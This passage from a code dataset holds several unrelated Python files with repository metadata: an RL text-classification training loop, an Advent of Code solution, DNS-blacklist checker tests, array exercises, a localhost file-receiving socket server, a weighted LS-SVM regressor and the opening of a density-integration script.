1\n total_norm = 0\n for p in nli_net.active_pred.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n for p in nli_net.active_classifier.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n total_norm = np.sqrt(total_norm.cpu())\n if total_norm > params.max_norm:\n shrink_factor = params.max_norm / total_norm\n current_lr = critic_active_optimizer.param_groups[0]['lr'] # current lr (no external \"lr\", for adam)\n critic_active_optimizer.param_groups[0]['lr'] = current_lr * shrink_factor # just for update\n 
critic_active_optimizer.param_groups[0]['lr'] = current_lr \n critic_active_optimizer.step()\n if RL_train:\n pass\n #actorModel.update_target_network()\n '''\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n #print(nli_net.classifier[4].bias)\n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n '''\n \n if LSTM_train:\n nli_net.update_target_network()\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n #print(nli_net.classifier[4].bias)\n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n else:\n nli_net.assign_target_network()\n pred = predict.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n assert len(pred) == len(s1[stidx:stidx + params.batch_size])\n\n # loss\n all_costs.append(avgloss/params.batch_size)\n words_count += (s1_batch.nelement() + s2_batch.nelement()) / params.word_emb_dim\n\n \n\n if len(all_costs) == 100:\n logs.append('{0} ; loss {1} ; sentence/s {2} ; words/s {3} ; accuracy train : {4}'.format(\n stidx, round(np.mean(all_costs), 2),\n int(len(all_costs) * params.batch_size / (time.time() - last_time)),\n int(words_count * 1.0 / (time.time() - last_time)),\n round(100.*correct.item()/(stidx+k), 2)))\n print(logs[-1])\n last_time = time.time()\n words_count = 0\n all_costs = []\n if LSTM_train:\n train_acc = round(100 * correct.item()/len(s1), 2)\n print('results : epoch {0} ; mean accuracy train : {1}'.format(epoch, train_acc))\n return train_acc\n else:\n return None\n\ndef evaluate(epoch, eval_type='valid', final_eval=False):\n nli_net.eval()\n correct = 0.\n global val_acc_best, lr, stop_training, adam_stop\n\n if eval_type == 'valid':\n print('\\nVALIDATION : Epoch {0}'.format(epoch))\n\n if eval_type == \"train\":\n s1 = train['s1']\n s2 = train['s2']\n target = train['label']\n if eval_type == \"test\":\n s1 = test['s1']\n s2 = test['s2']\n target = test['label']\n if eval_type == \"valid\":\n s1 = valid['s1']\n s2 = valid['s2']\n target = valid['label']\n\n for i in range(0, len(s1), params.batch_size):\n # prepare batch\n s1_batch, s1_len = get_batch(s1[i:i + params.batch_size], word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[i:i + params.batch_size], word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[i:i + 
params.batch_size])).cuda()\n\n # model forward\n output = nli_net((s1_batch, s1_len), (s2_batch, s2_len), \"target\")\n\n pred = output.data.max(1)[1]\n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n\n # save model\n eval_acc = round(100 * correct.item() / len(s1), 2)\n if final_eval:\n print('finalgrep : accuracy {0} : {1}'.format(eval_type, eval_acc))\n else:\n print('togrep : results : epoch {0} ; mean accuracy {1} :\\\n {2}'.format(epoch, eval_type, eval_acc))\n\n if eval_type == 'valid' and epoch <= params.n_epochs:\n if eval_acc > val_acc_best:\n print('saving model at epoch {0}'.format(epoch))\n if not os.path.exists(params.outputdir):\n os.makedirs(params.outputdir)\n torch.save(nli_net.state_dict(), os.path.join(params.outputdir,\n params.criticmodelname))\n val_acc_best = eval_acc\n else:\n if 'sgd' in params.optimizer:\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] / params.lrshrink\n print('Shrinking lr by : {0}. New lr = {1}'\n .format(params.lrshrink,\n critic_active_optimizer.param_groups[0]['lr']))\n if critic_active_optimizer.param_groups[0]['lr'] < params.minlr:\n stop_training = True\n if 'adam' in params.optimizer:\n # early stopping (at 2nd decrease in accuracy)\n stop_training = adam_stop\n adam_stop = True\n return eval_acc\n\ndef evaluate_RL(epoch, eval_type='valid', final_eval=False):\n nli_net.eval()\n actorModel.eval()\n correct = 0.\n global val_acc_best, lr, stop_training, adam_stop\n\n if eval_type == 'valid':\n print('\\nVALIDATION : Epoch {0}'.format(epoch))\n\n if eval_type == \"train\":\n s1 = train['s1']\n s2 = train['s2']\n target = train['label']\n if eval_type == \"test\":\n s1 = test['s1']\n s2 = test['s2']\n target = test['label']\n if eval_type == \"valid\":\n s1 = valid['s1']\n s2 = valid['s2']\n target = valid['label']\n\n ll, rl, ll_, rl_ = 0, 0, 0, 0\n deleteCount = dict()\n wordCount = dict()\n for i in range(0, len(s1)):\n if i % 100 == 0:\n print(\"Evaluating... 
\", i)\n # prepare batch\n s1_batch, s1_len = get_batch(s1[i:i + 1], word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[i:i + 1], word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[i:i + 1])).cuda()\n\n # model forward\n leftSummary = nli_net.summary((s1_batch, s1_len))[-1]\n rightSummary = nli_net.summary((s2_batch, s2_len))[-1]\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(s1_batch, rightSummary, int(s1_len), epsilon, Random=False)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(s2_batch, leftSummary, int(s2_len), epsilon, Random=False)\n #print(s1_batch.size(), actions_left, Rinput_left.size(), s2_batch.size(), actions_right, Rinput_right.size(), \"\\n\\n\")\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n\n pred = output.data.max(1)[1]\n\n if verbose:\n sourceL = s1[i:i + 1][0]\n sourceR = s2[i:i + 1][0]\n tempL, tempR = [], []\n \n for x in range(1,len(actions_left)-1):\n \n if sourceL[x] not in wordCount.keys():\n wordCount[sourceL[x]] = 1\n else:\n wordCount[sourceL[x]] += 1\n \n if actions_left[x] == 1:\n tempL.append(sourceL[x])\n if actions_left[x] == 0:\n if sourceL[x] not in deleteCount.keys():\n deleteCount[sourceL[x]] = 1\n else:\n deleteCount[sourceL[x]] += 1\n \n for x in range(1,len(actions_right)-1):\n \n if sourceR[x] not in wordCount.keys():\n wordCount[sourceR[x]] = 1\n else:\n wordCount[sourceR[x]] += 1\n\n if actions_right[x] == 1:\n tempR.append(sourceR[x])\n if actions_right[x] == 0:\n if sourceR[x] not in deleteCount.keys():\n deleteCount[sourceR[x]] = 1\n else:\n deleteCount[sourceR[x]] += 1\n \n with open(\"results.txt\", \"a\") as f:\n f.write(\" \".join(sourceL[1:-1]) + \"-----\" + \" \".join(sourceR[1:-1]) + \"\\n\")\n f.write(\" \".join(tempL) + \"-----\" + \" \".join(tempR) + \"\\nactual: \" + str(int(tgt_batch)) + \" pred: \" + str(int(pred)) + \"\\n\\n\")\n ll += len(actions_left)\n rl += len(actions_right)\n ll_ += Counter(actions_left)[1]\n rl_ += Counter(actions_right)[1] \n \n correct += pred.long().eq(tgt_batch.data.long()).cpu().sum()\n with open(\"results.txt\", \"a\") as f:\n f.write(\"Average left: \" + str(ll/len(s1)) + \"\\nAverage left new: \" + str(ll_/len(s1)) + \"\\nAverage right: \" + str(rl/len(s1)) + \"\\nAverage right new: \" + str(rl_/len(s1)))\n #f.write(deleteCount + \"\\n\\n\\n\" + wordCount)\n for key, value in sorted(deleteCount.items(), key=lambda item: item[1]):\n f.write(str(key) + \":\" + str(value) + \"\\n\")\n f.write(\"\\n\\n\\n\")\n for key, value in sorted(wordCount.items(), key=lambda item: item[1]):\n f.write(str(key) + \":\" + str(value) + \"\\n\")\n # save model\n eval_acc = round(100 * correct.item() / len(s1), 2)\n print(eval_type, \" accuracy: \", eval_acc)\n \n if final_eval:\n params.criticmodelname = bothCritic\n params.actormodelname = bothActor\n \n if eval_type == 'valid' and epoch <= params.n_epochs:\n if eval_acc > val_acc_best:\n print('saving model at epoch {0}'.format(epoch))\n if not os.path.exists(params.outputdir):\n os.makedirs(params.outputdir)\n torch.save(actorModel.state_dict(), os.path.join(params.outputdir, params.actormodelname))\n if final_eval:\n torch.save(nli_net.state_dict(), os.path.join(params.outputdir, params.criticmodelname))\n val_acc_best = eval_acc\n else:\n if final_eval:\n if 'sgd' in params.optimizer:\n 
critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] / params.lrshrink\n print('Shrinking lr by : {0}. New lr = {1}'\n .format(params.lrshrink,\n critic_active_optimizer.param_groups[0]['lr']))\n if critic_active_optimizer.param_groups[0]['lr'] < params.minlr:\n stop_training = True\n if 'adam' in params.optimizer:\n # early stopping (at 2nd decrease in accuracy)\n stop_training = adam_stop\n adam_stop = True\n return eval_acc\n\n\n\n\n''' INITIAL CRITIC TRAIN\n\"\"\"\nTrain model on Natural Language Inference task\n\"\"\"\nepoch = 1\nwhile not stop_training and epoch <= params.n_epochs:\n train_acc = trainepoch(epoch, RL_train = False)\n eval_acc = evaluate(epoch, 'valid')\n epoch += 1\n\n# Run best model on test set.\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nprint(evaluate(epoch, 'test'))\nprint(evaluate(epoch, 'valid'))\n'''\n\n'''\nprint(\"ACTOR TRAIN\")\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nepoch = 1\nwhile not stop_training and epoch <= params.n_epochs:\n print(trainepoch(epoch, LSTM_train = False))\n eval_acc = evaluate_RL(epoch, 'valid')\n epoch += 1\n\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, params.actormodelname)))\nprint(\"\\nActor Loaded\")\n#print(evaluate_RL(epoch, 'train'))\n#print(evaluate_RL(epoch, 'test'))\nprint(evaluate_RL(epoch, 'test'))\n'''\n\nprint(\"FINAL CRITIC TRAIN\")\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, params.criticmodelname)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, params.actormodelname)))\nprint(\"\\nActor Loaded\")\nepoch = 1\nwhile not stop_training and epoch <=params.n_epochs:\n train_acc = trainepoch(epoch)\n eval_acc = evaluate_RL(epoch, 'valid', final_eval = True)\n print(eval_acc)\n epoch += 1\nnli_net.load_state_dict(torch.load(os.path.join(params.outputdir, bothCritic)))\nprint(\"\\nCritic Loaded\")\nactorModel.load_state_dict(torch.load(os.path.join(params.outputdir, bothActor)))\nprint(\"\\nActor Loaded\")\nprint(evaluate_RL(epoch, 'test'))\n\n\n","repo_name":"souvik491/RL-Final-Assignment","sub_path":"RL - Souvik Kundu/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":30488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
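The Sampling_RL routine in the record above mixes exploitation and epsilon-random exploration over per-token keep/drop actions. A minimal standalone sketch of that sampling scheme, assuming a list of per-token keep probabilities (keep_probs is a hypothetical stand-in for the actor's output, not the repo's API):

import random

def sample_actions(keep_probs, epsilon=0.1, greedy=False):
    """Epsilon-greedy Bernoulli sampling over per-token keep probabilities."""
    actions = []
    for p in keep_probs:
        if greedy:
            actions.append(1 if p >= 0.5 else 0)
        elif random.random() > epsilon:
            actions.append(1 if random.random() < p else 0)   # follow the policy
        else:
            actions.append(0 if random.random() < p else 1)   # explore: invert it
    if actions and not any(actions):
        actions[-1] = 1   # keep at least one token, roughly as Sampling_RL does
    return actions

print(sample_actions([0.9, 0.2, 0.7]))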
+{"seq_id":"7766735382","text":"from itertools import product\n\ndef parse_instructions(lines):\n instructions = []\n for line in lines:\n instruction = {}\n tokens = line.split()\n if tokens[0] == 'mask':\n instruction['type'] = 'mask'\n instruction['value'] = tokens[-1]\n else:\n address = tokens[0].split('[')[1].split(']')[0]\n instruction['type'] = 'mem'\n instruction['address'] = int(address)\n instruction['value'] = int(tokens[-1])\n instructions.append(instruction)\n\n return instructions\n\n\ndef apply_mask(mask_string, number):\n\n binary = list(bin(number)[2:].rjust(36, '0'))\n\n x_indices = []\n for (i, char) in enumerate(mask_string):\n if char == '1':\n binary[i] = '1'\n if char == 'X':\n x_indices.append(i)\n\n numbers = []\n if not len(x_indices):\n numbers.append(binary)\n\n combinations = [[0,1] for index in x_indices]\n combinations = product(*combinations)\n\n for combination in combinations:\n new_binary = binary.copy()\n for (i,value) in enumerate(combination):\n new_binary[x_indices[i]] = str(value)\n numbers.append(new_binary)\n\n return list(map(lambda x: int(x, 2), map(lambda x: \"\".join(x), numbers)))\n\n\ndef run(instructions, memory):\n current_mask = None\n for instruction in instructions:\n if instruction['type'] == 'mask':\n current_mask = instruction['value']\n else:\n addresses = apply_mask(current_mask, int(instruction['address']))\n for address in addresses:\n memory[address] = instruction['value']\n\n\nwith open('input', 'r') as f:\n lines = [line.strip() for line in f.readlines()]\n\ninstructions = parse_instructions(lines)\n\nmemory = {}\n\nrun(instructions, memory)\n\nprint(sum(memory.values()))\n","repo_name":"medvesekg/adventofcode2020","sub_path":"14/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35337295884","text":"import pytest\n\nfrom aiodnsbl.checker import DNSBLChecker\nfrom aiodnsbl.providers import BASE_DOMAIN_PROVIDERS, BASE_PROVIDERS\n\n\n@pytest.mark.asyncio\nasync def test_checker():\n checker = DNSBLChecker()\n\n res = await checker.check(\"68.128.212.240\")\n assert res.blacklisted is True\n assert len(res.detected_by) > 0\n assert len(res.providers) == len(BASE_PROVIDERS)\n\n results = await checker.bulk_check([\"68.128.212.240\", \"8.8.8.8\"])\n assert len(results) == 2\n\n res = await checker.check(\"9.9.9.9\")\n assert res.blacklisted is False\n assert len(res.detected_by) == 0\n\n\n@pytest.mark.asyncio\nasync def test_checker_ipv6():\n checker = DNSBLChecker()\n res = await checker.check(\"2001:4860:4860::8844\")\n assert res.blacklisted is False\n\n\n@pytest.mark.asyncio\nasync def test_domain_checker():\n checker = DNSBLChecker()\n domain = \"example.com\"\n res = await checker.check(domain)\n assert res.blacklisted is False\n assert len(res.providers) == len(BASE_DOMAIN_PROVIDERS)\n\n\n@pytest.mark.asyncio\nasync def test_domain_idna():\n checker = DNSBLChecker()\n res = await checker.check(\"вуцхгйю.рф\")\n assert res.address == \"вуцхгйю.рф\"\n\n\n@pytest.mark.asyncio\nasync def test_domain_providers():\n checker = DNSBLChecker()\n res = await checker.check(\"google.com\")\n assert res.blacklisted is False\n\n\n@pytest.mark.asyncio\nasync def test_wrong_domain_format():\n invalid_inputs = [\"abc-\", \"8.8.8.256\"]\n for invalid_input in invalid_inputs:\n checker = DNSBLChecker()\n with pytest.raises(ValueError):\n await checker.check(invalid_input)\n\n\n@pytest.mark.asyncio\nasync def test_capitalization_in_domain():\n capitalized_domains = [\"Google.com\", \"Facebook.com\"]\n for domain in capitalized_domains:\n checker = DNSBLChecker()\n res = await checker.check(domain)\n assert res.blacklisted is False\n","repo_name":"ninoseki/aiodnsbl","sub_path":"tests/test_checker.py","file_name":"test_checker.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"18784246565","text":"# 5.0 Reorder List\ndef even_odd(A: list[int]) -> None:\n \"\"\"\n Reorder an integer list so that even entries appear first.\n \"\"\"\n next_even, next_odd = 0, len(A) - 1\n while next_even < next_odd:\n if A[next_even] % 2 == 0:\n next_even += 1\n else:\n A[next_even], A[next_odd] = A[next_odd], A[next_even]\n next_odd -= 1\n\n# 5.1 The Dutch National Flag Problem\ndef dutch_flag(A: list[int], pivot_idx: int) -> None:\n \"\"\"\n Takes an integer array, A, and an index, pivot_idx, and rearranges the elements such that all elements\n less than A[pivot_idx] (the \"pivot\") appear first, followed by elements equal to the pivot, followed\n by elements greater than the pivot.\n \"\"\"\n if len(A) < 2:\n return None\n\n if pivot_idx >= len(A):\n raise IndexError(\"Pivot index (idx) out of range.\")\n\n lesser = []\n equal = []\n greater = []\n for a in A:\n if a < A[pivot_idx]:\n lesser.append(a)\n elif a == A[pivot_idx]:\n equal.append(a)\n else:\n greater.append(a)\n \n lesser.extend(equal)\n lesser.extend(greater)\n\n for i in range(0,len(A)):\n A[i] = lesser[i]\n\ndef increment_array_integer(A: list[int]) -> None:\n \"\"\"\n Takes as input an array of digits encoding a nonnegative decimal integer D and updates\n the array to represent the integer D+1. For example, the input [1,2,9] is updated to\n [1,3,0]\n \"\"\"\n idx = len(A) - 1\n found = False\n\n while idx > -1 and found == False:\n if A[idx] < 9:\n A[idx] += 1\n found = True\n else:\n A[idx] = 0\n \n idx -= 1\n \n if idx == -1 and found == False:\n A.append(0)\n A[0] = 1\n","repo_name":"TommyHughes/eopi_python","sub_path":"arrays/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"26396373510","text":"import socket\n\nterminate_string = '-term-end-'\nBUFF_SIZE = 1024\n\nif __name__ == \"__main__\":\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.bind(('127.0.0.1', 8080))\n server_socket.listen(10)\n\n while True:\n (client_socket, server) = server_socket.accept()\n\n result = ''.encode('utf-8')\n\n while True:\n data = client_socket.recv(BUFF_SIZE)\n\n if data.find(terminate_string.encode('utf-8')) != -1:\n data = data.replace(terminate_string.encode('utf-8'), ''.encode('utf-8'))\n result += data\n break\n\n result += data\n if len(data) < BUFF_SIZE:\n break\n\n if result.find(terminate_string.encode('utf-8')) != -1:\n result = result.replace(terminate_string.encode('utf-8'), ''.encode('utf-8'))\n print(f'length of result: {len(result)}')\n\n sendData = f'received {len(result)} bytes' + terminate_string\n send_len = client_socket.send(sendData.encode('utf-8'))\n\n if send_len != len(sendData):\n print('error on send')\n\n with open('./4k_image_received.jpg', 'wb') as f:\n f.write(result)\n\n client_socket.close()\n","repo_name":"OptimistLabyrinth/socket_programming","sub_path":"python3_implementation/v3/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"23713249054","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 5 09:30:24 2018\r\n\r\n@author: lj\r\n\"\"\"\r\nfrom numpy import *\r\n\r\ndef loadDataSet(filename):\r\n '''导入数据\r\n input: filename:文件名\r\n '''\r\n dataMat = []\r\n labelMat = []\r\n fr = open(filename)\r\n for line in fr.readlines():\r\n lineArr = line.strip().split('\\t')\r\n dataMat.append(float(lineArr[0]))\r\n labelMat.append(float(lineArr[1]))\r\n return mat(dataMat).T,mat(labelMat).T\r\n \r\n\r\ndef kernelTrans(X,A,kTup):\r\n '''数据集中每一个数据向量与A的核函数值\r\n input: X--特征数据集\r\n A--输入向量\r\n kTup--核函数参量定义\r\n output: K--数据集中每一个数据向量与A的核函数值组成的矩阵\r\n '''\r\n X = mat(X)\r\n m,n = shape(X)\r\n K = mat(zeros((m,1)))\r\n if kTup[0] == 'lin':\r\n K = X * A.T\r\n elif kTup[0] == 'rbf':\r\n for j in range(m):\r\n deltaRow = X[j] - A\r\n K[j] = deltaRow * deltaRow.T\r\n K = exp(K/(-1 * kTup[1] ** 2))\r\n else: raise NameError('Houston We Have a Problem ,That Kernel is not recognized')\r\n return K\r\n \r\nclass optStruct:\r\n def __init__(self,dataMatIn,classLabels,C,kTup):\r\n self.X = dataMatIn\r\n self.labelMat = classLabels\r\n self.C = C\r\n self.m = shape(dataMatIn)[0]\r\n self.alphas = mat(zeros((self.m,1)))\r\n self.b = 0\r\n self.K = mat(zeros((self.m,self.m))) #特征数据集合中向量两两核函数值组成的矩阵,[i,j]表示第i个向量与第j个向量的核函数值\r\n for i in range(self.m):\r\n self.K[:,i] = kernelTrans(self.X, self.X[i,:], kTup)\r\n \r\n\r\ndef leastSquares(dataMatIn,classLabels,C,kTup):\r\n '''最小二乘法求解alpha序列\r\n input:dataMatIn:特征数据集\r\n classLabels:分类标签集\r\n C:参数,(松弛变量,允许有些数据点可以处于分隔面的错误一侧)\r\n kTup: 核函数类型和参数选择 \r\n output:b--w.T*x+b=y中的b\r\n alphas:alphas序列 \r\n '''\r\n ##1.参数设置\r\n oS = optStruct(dataMatIn,classLabels,C,kTup)\r\n unit = mat(ones((oS.m,1))) #[1,1,...,1].T\r\n I = eye(oS.m)\r\n zero = mat(zeros((1,1)))\r\n upmat = hstack((zero,unit.T))\r\n downmat = hstack((unit,oS.K + I/float(C)))\r\n ##2.方程求解\r\n completemat = vstack((upmat,downmat)) #lssvm中求解方程的左边矩阵\r\n rightmat = vstack((zero,oS.labelMat)) # lssvm中求解方程的右边矩阵\r\n b_alpha = completemat.I * rightmat\r\n ##3.导出偏置b和Lagrange乘子序列\r\n oS.b = b_alpha[0,0]\r\n for i in range(oS.m):\r\n oS.alphas[i,0] = b_alpha[i+1,0]\r\n e = oS.alphas/C\r\n return oS.alphas,oS.b,e\r\n\r\ndef weights(e):\r\n '''计算权重序列\r\n input:e(mat):LSSVM误差矩阵\r\n output:v(mat):权重矩阵\r\n '''\r\n ##1.参数设置\r\n c1 = 2.5\r\n c2 = 3\r\n m = shape(e)[0]\r\n v = mat(zeros((m,1)))\r\n v1 = eye(m)\r\n q1 = int(m/4.0)\r\n q3 = int((m*3.0)/4.0)\r\n e1 = []\r\n shang = mat(zeros((m,1)))\r\n ##2.误差序列从小到大排列\r\n for i in range(m):\r\n e1.append(e[i,0])\r\n e1.sort()\r\n ##3.计算误差序列第三四分位与第一四分位的差\r\n IQR = e1[q3] - e1[q1]\r\n ##4.计算s的值\r\n s = IQR/(2 * 0.6745)\r\n ##5.计算每一个误差对应的权重\r\n for j in range(m):\r\n shang[j,0] = abs(e[j,0]/s)\r\n for x in range(m):\r\n if shang[x,0] <= c1:\r\n v[x,0] = 1.0\r\n if shang[x,0] > c1 and shang[x,0] <= c2:\r\n v[x,0] = (c2 - shang[x,0])/(c2 - c1)\r\n if shang[x,0] > c2:\r\n v[x,0] = 0.0001\r\n v1[x,x] = 1/float(v[x,0])\r\n return v1\r\n\r\ndef weightsleastSquares(dataMatIn,classLabels,C,kTup,v1):\r\n '''最小二乘法求解alpha序列\r\n input:dataMatIn:特征数据集\r\n classLabels:分类标签集\r\n C:参数,(松弛变量,允许有些数据点可以处于分隔面的错误一侧)\r\n kTup: 核函数类型和参数选择 \r\n output:b--w.T*x+b=y中的b\r\n alphas:alphas序列 \r\n '''\r\n ##1.参数设置\r\n oS = optStruct(dataMatIn,classLabels,C,kTup)\r\n unit = mat(ones((oS.m,1))) #[1,1,...,1].T\r\n #I = eye(oS.m)\r\n gamma = kTup[1]\r\n zero = mat(zeros((1,1)))\r\n upmat = hstack((zero,unit.T))\r\n downmat = hstack((unit,oS.K + v1/float(C)))\r\n ##2.方程求解\r\n completemat = vstack((upmat,downmat)) 
#lssvm中求解方程的左边矩阵\r\n rightmat = vstack((zero,oS.labelMat)) # lssvm中求解方程的右边矩阵\r\n b_alpha = completemat.I * rightmat\r\n ##3.导出偏置b和Lagrange乘子序列\r\n oS.b = b_alpha[0,0]\r\n for i in range(oS.m):\r\n oS.alphas[i,0] = b_alpha[i+1,0]\r\n e = oS.alphas/C\r\n return oS.alphas,oS.b\r\n\r\n\r\ndef predict(alphas,b,dataMat):\r\n '''预测结果\r\n input:alphas(mat):WLSSVM模型的Lagrange乘子序列\r\n b(float):WLSSVM模型回归方程的偏置\r\n dataMat(mat):测试样本集\r\n output:predict_result(mat):测试结果\r\n '''\r\n m,n = shape(dataMat)\r\n predict_result = mat(zeros((m,1)))\r\n for i in range(m):\r\n Kx = kernelTrans(dataMat,dataMat[i,:],kTup) #可以对alphas进行稀疏处理找到更准确的值 \r\n predict_result[i,0] = Kx.T * alphas + b \r\n return predict_result\r\n\r\ndef predict_average_error(predict_result,label):\r\n '''计算平均预测误差\r\n input:predict_result(mat):预测结果\r\n label(mat):实际结果\r\n output:average_error(float):平均误差\r\n '''\r\n m,n = shape(predict_result)\r\n error = 0.0\r\n for i in range(m):\r\n error += abs(predict_result[i,0] - label[i,0])\r\n average_error = error / m\r\n return average_error\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n ##1.数据导入\r\n print('--------------------Load Data------------------------')\r\n dataMat,labelMat = loadDataSet('sine.txt')\r\n ##2.参数设置\r\n print('--------------------Parameter Setup------------------')\r\n C = 0.6\r\n k1 = 0.3\r\n kernel = 'rbf'\r\n kTup = (kernel,k1)\r\n ##3.求解LSSVM模型\r\n print('-------------------Save LSSVM Model-----------------')\r\n alphas,b,e = leastSquares(dataMat,labelMat,C,kTup)\r\n ##4.计算误差权重\r\n print('----------------Calculate Error Weights-------------')\r\n v1 = weights(e)\r\n ##5.求解WLSSVM模型\r\n print('------------------Save WLSSVM Model--------------- -')\r\n alphas1,b1 = weightsleastSquares(dataMat,labelMat,C,kTup,v1)\r\n ##6.预测结果\r\n print('------------------Predict Result------------------ -')\r\n predict_result = predict(alphas1,b1,dataMat)\r\n ##7.平均误差\r\n print('-------------------Average Error------------------ -')\r\n average_error = predict_average_error(predict_result,labelMat)\r\n \r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"shiluqiang/WLSSVM_python","sub_path":"wlssvm.py","file_name":"wlssvm.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"}
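The system assembled in leastSquares above is the standard LS-SVM saddle-point system [[0, 1^T], [1, K + I/C]] [b; alpha] = [0; y]. A toy numpy sketch of the same assembly and solve on random data with a linear kernel (illustrative only, not part of the repo):

import numpy as np

np.random.seed(0)
X = np.random.randn(5, 1)            # 5 training points
y = 2.0 * X[:, 0] + 0.1              # regression targets
C = 10.0

K = X @ X.T                          # linear kernel matrix
m = len(y)
A = np.zeros((m + 1, m + 1))
A[0, 1:] = 1.0
A[1:, 0] = 1.0
A[1:, 1:] = K + np.eye(m) / C        # regularized kernel block

rhs = np.concatenate(([0.0], y))
b_alpha = np.linalg.solve(A, rhs)    # [b, alpha_1..alpha_m]
b, alpha = b_alpha[0], b_alpha[1:]
pred = K @ alpha + b                 # in-sample predictions
print(np.round(pred - y, 3))         # residuals, small for this easy fit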
+{"seq_id":"26006455408","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom scipy.io import savemat\nfrom scipy.io import loadmat\nimport timeit\n\n# import density integration functions\nfrom DensityIntegrationUncertaintyQuantification import Density_integration_Poisson_uncertainty\nfrom DensityIntegrationUncertaintyQuantification import Density_integration_WLS_uncertainty\n\nimport loadmat_functions\n\nimport helper_functions\n\ndef main():\n \n # file containing displacements and uncertainties\n filename = 'sample-displacements.mat'\n \n # displacement estimation method ('c' for correlation and 't' for tracking)\n displacement_estimation_method = 'c'\n \n # displacement uncertainty method ('MC' for correlation and 'crlb' for tracking)\n displacement_uncertainty_method = 'MC'\n\n # set integration method ('p' for poisson or 'w' for wls)\n density_integration_method = 'w'\n \n # dataset type (syntehtic or experiment)\n dataset_type = 'synthetic'\n\n # -------------------------------------------------\n # experimental parameters for density integration\n # -------------------------------------------------\n experimental_parameters = dict()\n\n # ambient/reference density (kg/m^3)\n experimental_parameters['rho_0'] = 1.225\n\n # uncertainty in the reference density (kg/m^3) (MUST BE GREATER THAN 0)\n experimental_parameters['sigma_rho_0'] = 1e-10\n\n # gladstone dale constant (m^3/kg)\n experimental_parameters['gladstone_dale'] = 0.225e-3\n\n # ambient refractive index\n experimental_parameters['n_0'] = 1.0 + experimental_parameters['gladstone_dale'] * experimental_parameters['rho_0']\n\n # thickness of the density gradient field (m)\n experimental_parameters['delta_z'] = 0.01\n\n # distance between lens and dot target (object / working distance) (m)\n experimental_parameters['object_distance'] = 1.0\n\n # distance between the mid-point of the density gradient field and the dot pattern (m)\n experimental_parameters['Z_D'] = 0.25\n\n # distance between the mid-point of the 